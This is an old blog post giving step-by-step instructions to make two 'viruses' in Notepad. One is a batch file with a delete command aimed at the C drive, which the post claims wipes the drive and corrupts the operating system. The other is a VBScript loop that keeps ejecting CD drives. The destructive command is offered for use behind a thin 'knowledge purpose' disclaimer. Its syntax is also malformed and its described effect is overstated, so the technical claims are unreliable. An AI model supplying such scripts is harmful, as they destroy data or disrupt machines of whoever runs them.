Friday, May 20, 2016

HOW TO CREATE A COMPUTER VIRUS IN SECONDS

1) Create A Dangerous Virus

# Step 1
First of all in your windows OS open
the notepad.

# Step 2
Step 2. Now copy and paste the below code in your notepad screen.

    @Echo off
    Del C: *.* |y

# Step 3
Now save this file as virus.bat
(you can select any of random name but .bat after that must be there).

Now running the file will delete the C drive completely and the operating system of the respective computer will get corrupted.

# Note This method is only for knowledge purpose. Don’t try this in your computer as it will completely format your C drive.

2. Creating a Harmless Cdrom Virus

# Step 1

Open Notepad and Paste the following
code in it and save it as CD-ROM.vbs or
anything.
  
  Set oWMP = CreateObject
(“WMPlayer.OCX.7”)
Set colCDROMs =
oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

# When you double click on this file you will be really amazed at what this simple harmless virus can do. Your CD/DVD drives will get continuously ejected. To stop this virus you need to open Task manager and select process tab and end the wscript.exe file.

No comments:

Post a Comment